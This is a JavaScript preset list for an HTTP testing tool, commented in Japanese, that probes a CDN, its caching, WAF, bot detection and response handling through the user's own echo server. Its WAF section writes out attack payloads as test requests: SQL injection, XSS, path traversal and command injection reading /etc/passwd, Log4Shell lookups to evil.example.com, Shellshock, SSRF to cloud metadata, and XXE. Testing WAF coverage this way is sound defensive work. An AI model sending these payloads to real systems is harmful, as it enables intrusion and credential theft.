// プリセット集。zresp のエンドポイントに合わせている。
// fields: cat, name, method, path, headers, body, note
window.PRESETS = [

  // ========== 基本 ==========
  { cat: 'basic', name: 'Echo (JSON)', method: 'GET', path: '/api/echo',
    note: 'リクエスト内容をJSONで返す。CDNが何を付与/書き換えしたか確認するベース。' },
  { cat: 'basic', name: 'Echo (text)', method: 'GET', path: '/api/echo.txt',
    note: 'テキスト形式で読みやすい。' },
  { cat: 'basic', name: 'Inspect (HTML)', method: 'GET', path: '/inspect',
    note: 'ブラウザで直接見たい時用。' },
  { cat: 'basic', name: 'Health check', method: 'GET', path: '/healthz',
    note: 'オリジン到達確認。' },
  { cat: 'basic', name: 'POST Echo (JSON body)', method: 'POST', path: '/api/echo',
    headers: 'Content-Type: application/json',
    body: '{"hello":"world"}',
    note: 'POSTボディがオリジンまで届くか。' },

  // ========== WAF ==========
  { cat: 'waf', name: 'SQLi - 古典 (OR 1=1)', method: 'GET',
    path: "/api/echo?id=1'%20OR%20'1'='1",
    note: 'クエリパラメータのSQLi検知。' },
  { cat: 'waf', name: 'SQLi - UNION SELECT', method: 'GET',
    path: '/api/echo?q=1%20UNION%20SELECT%20username,password%20FROM%20users--',
    note: 'UNION型。' },
  { cat: 'waf', name: 'SQLi - sleep based', method: 'GET',
    path: '/api/echo?id=1%20AND%20SLEEP(5)--',
    note: 'タイムベースSQLi。' },
  { cat: 'waf', name: 'XSS - script tag', method: 'GET',
    path: '/api/echo?s=%3Cscript%3Ealert(1)%3C/script%3E',
    note: 'クラシックなXSS payload。' },
  { cat: 'waf', name: 'XSS - img onerror', method: 'GET',
    path: '/api/echo?s=%3Cimg%20src=x%20onerror=alert(1)%3E',
    note: 'タグ系。' },
  { cat: 'waf', name: 'XSS - javascript URI', method: 'GET',
    path: '/api/echo?url=javascript:alert(1)',
    note: 'URIスキーム経由。' },
  { cat: 'waf', name: 'Path Traversal', method: 'GET',
    path: '/api/echo?file=../../../../etc/passwd',
    note: 'ディレクトリトラバーサル。' },
  { cat: 'waf', name: 'Path Traversal (encoded)', method: 'GET',
    path: '/api/echo?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd',
    note: 'URLエンコードでバイパス試行。' },
  { cat: 'waf', name: 'RCE - command injection', method: 'GET',
    path: '/api/echo?cmd=;cat%20/etc/passwd',
    note: 'コマンドインジェクション。' },
  { cat: 'waf', name: 'Log4Shell (JNDI)', method: 'GET',
    path: '/api/echo',
    headers: 'X-Test: ${jndi:ldap://evil.example.com/a}\nUser-Agent: ${jndi:ldap://evil.example.com/a}',
    note: 'Log4Shell。User-Agentと任意ヘッダ両方に。' },
  { cat: 'waf', name: 'Shellshock UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: () { :;}; echo vulnerable',
    note: 'Bash Shellshock。' },
  { cat: 'waf', name: 'SSRF - metadata IP', method: 'GET',
    path: '/api/echo?url=http://169.254.169.254/latest/meta-data/',
    note: 'AWS metadata SSRF。' },
  { cat: 'waf', name: 'Scanner UA - sqlmap', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: sqlmap/1.7.2#stable (http://sqlmap.org)',
    note: 'スキャナUA。' },
  { cat: 'waf', name: 'Scanner UA - nikto', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: Mozilla/5.00 (Nikto/2.1.6)',
    note: 'Niktoスキャナ。' },
  { cat: 'waf', name: 'Scanner UA - nmap', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine)',
    note: 'Nmap NSE。' },
  { cat: 'waf', name: 'LDAP injection', method: 'GET',
    path: '/api/echo?user=*)(uid=*))(|(uid=*',
    note: 'LDAP。' },
  { cat: 'waf', name: 'XXE 試行 (POST XML)', method: 'POST',
    path: '/api/echo',
    headers: 'Content-Type: application/xml',
    body: '<?xml version="1.0"?>\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<root>&xxe;</root>',
    note: 'XML External Entity。' },
  { cat: 'waf', name: 'Method override ヘッダ', method: 'GET',
    path: '/api/echo',
    headers: 'X-HTTP-Method-Override: DELETE',
    note: 'メソッド書き換え試行をWAFが検知するか。' },
  { cat: 'waf', name: '巨大ボディ (1MB)', method: 'POST',
    path: '/api/echo',
    headers: 'Content-Type: text/plain',
    body: '__BIG_BODY_1MB__',
    note: 'request body サイズ制限のテスト。' },
  { cat: 'waf', name: 'Cookie injection', method: 'GET',
    path: '/api/echo',
    headers: "Cookie: PHPSESSID=abc'; DROP TABLE users--",
    note: 'Cookie値にSQLi。CORSでブラウザに無視される可能性あり。' },
  { cat: 'waf', name: '怪しい Referer', method: 'GET',
    path: '/api/echo',
    headers: 'Referer: http://evil.example.com/phishing',
    note: 'Refererベースの検知。' },

  // ========== CDN / キャッシュ ==========
  { cat: 'cdn', name: 'キャッシュ probe (timestamp)', method: 'GET',
    path: '/cache/timestamp',
    note: '同URLを2回叩いて、2回目がHITになるか確認 (連打ボタンで)。' },
  { cat: 'cdn', name: '強制MISS (cache-buster)', method: 'GET',
    path: '/cache/timestamp?_=__RAND__',
    note: 'クエリ毎に変えてMISSさせる。__RAND__はランダムで置換される。' },
  { cat: 'cdn', name: 'ETag 取得', method: 'GET',
    path: '/cache/etag',
    note: 'ETag/Last-Modified を含むレスポンス。' },
  { cat: 'cdn', name: '条件付き GET (If-None-Match)', method: 'GET',
    path: '/cache/etag',
    headers: 'If-None-Match: "*"',
    note: '304が返るか。CDN側で書き換えされていないか。' },
  { cat: 'cdn', name: 'Cache-Control: max-age=60', method: 'GET',
    path: '/cache/control?cc=max-age%3D60',
    note: 'CDNがオリジンのCache-Controlを尊重するか。' },
  { cat: 'cdn', name: 'Cache-Control: no-store', method: 'GET',
    path: '/cache/control?cc=no-store',
    note: 'no-storeでCDNがキャッシュしないか。' },
  { cat: 'cdn', name: 'Cache-Control: private', method: 'GET',
    path: '/cache/control?cc=private',
    note: 'privateの扱い。' },
  { cat: 'cdn', name: 's-maxage 優先', method: 'GET',
    path: '/cache/control?cc=max-age%3D0,%20s-maxage%3D60',
    note: 'CDNは s-maxage を優先するか。' },
  { cat: 'cdn', name: 'Vary: Accept-Encoding', method: 'GET',
    path: '/cache/vary?vary=Accept-Encoding',
    headers: 'Accept-Encoding: gzip',
    note: 'Vary キャッシュ分離。' },
  { cat: 'cdn', name: 'Vary: User-Agent', method: 'GET',
    path: '/cache/vary?vary=User-Agent',
    note: 'UA毎にキャッシュ分離されるか。' },
  { cat: 'cdn', name: 'Range request (0-1023)', method: 'GET',
    path: '/cache/bytes/1048576',
    headers: 'Range: bytes=0-1023',
    note: '206が返るか、CDNがRangeを通すか。' },
  { cat: 'cdn', name: 'Brotli 要求', method: 'GET',
    path: '/cache/timestamp',
    headers: 'Accept-Encoding: br',
    note: 'CDNがbrで圧縮するか。' },
  { cat: 'cdn', name: 'gzip 要求', method: 'GET',
    path: '/cache/timestamp',
    headers: 'Accept-Encoding: gzip',
    note: 'gzip圧縮されるか。' },
  { cat: 'cdn', name: 'zstd 要求', method: 'GET',
    path: '/cache/timestamp',
    headers: 'Accept-Encoding: zstd',
    note: 'zstd対応確認。' },
  { cat: 'cdn', name: '圧縮なし要求', method: 'GET',
    path: '/cache/timestamp',
    headers: 'Accept-Encoding: identity',
    note: '生で返るか。' },
  { cat: 'cdn', name: '大きなボディ (10MB)', method: 'GET',
    path: '/cache/bytes/10485760',
    note: 'CDNの転送サイズ制限。' },

  // ========== レート / Bot ==========
  { cat: 'bot', name: 'Echo (連打用)', method: 'GET',
    path: '/api/echo',
    note: '連打ボタンでバースト送信。レート制限/チャレンジを誘発。' },
  { cat: 'bot', name: 'curl UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: curl/8.4.0',
    note: 'curlがブロックされるか。' },
  { cat: 'bot', name: 'python-requests UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: python-requests/2.31.0',
    note: 'Pythonクライアントを装う。' },
  { cat: 'bot', name: 'Go-http-client UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: Go-http-client/1.1',
    note: 'Go標準クライアントを装う。' },
  { cat: 'bot', name: 'GoogleBot UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
    note: '正規BotのUA。CDNが検証(rDNS等)するか。' },
  { cat: 'bot', name: '空 UA', method: 'GET',
    path: '/api/echo',
    headers: 'User-Agent: ',
    note: 'UA空欄。ブラウザが上書きする可能性あり。' },
  { cat: 'bot', name: 'Accept-Language なし', method: 'GET',
    path: '/api/echo',
    headers: 'Accept-Language: ',
    note: '言語ヘッダの欠落。' },
  { cat: 'bot', name: '怪しい順序のヘッダ', method: 'GET',
    path: '/api/echo',
    headers: 'Accept: */*\nAccept-Encoding: gzip',
    note: '実ブラウザより少なすぎるヘッダセット。' },

  // ========== レスポンス整形 ==========
  { cat: 'resp', name: '500 を返す', method: 'GET', path: '/response/status/500',
    note: 'CDNが5xxをキャッシュ/隠蔽するか。' },
  { cat: 'resp', name: '503 を返す', method: 'GET', path: '/response/status/503',
    note: 'メンテ系。' },
  { cat: 'resp', name: '429 を返す', method: 'GET', path: '/response/status/429',
    note: 'レート制限相当。' },
  { cat: 'resp', name: '301 リダイレクト x1', method: 'GET', path: '/response/redirect/1',
    note: '単発リダイレクト。' },
  { cat: 'resp', name: 'リダイレクトチェーン x5', method: 'GET', path: '/response/redirect/5',
    note: 'CDNがリダイレクトを許容するか。fetchはfollowする。' },
  { cat: 'resp', name: '遅延 5秒', method: 'GET', path: '/response/delay/5',
    note: 'タイムアウト境界の検証。' },
  { cat: 'resp', name: '遅延 30秒', method: 'GET', path: '/response/delay/30',
    note: 'CDNのidle/read timeoutを超えるか。' },
  { cat: 'resp', name: 'Set-Cookie', method: 'GET', path: '/response/cookies/set?name=test&value=1',
    note: 'CDNがSet-Cookieを通すか/書き換えるか。' },
  { cat: 'resp', name: 'カスタムレスポンスヘッダ', method: 'GET',
    path: '/response/headers?X-Custom=hello&X-Robots-Tag=noindex',
    note: 'CDNが任意ヘッダを通すか/削除するか。' },
];
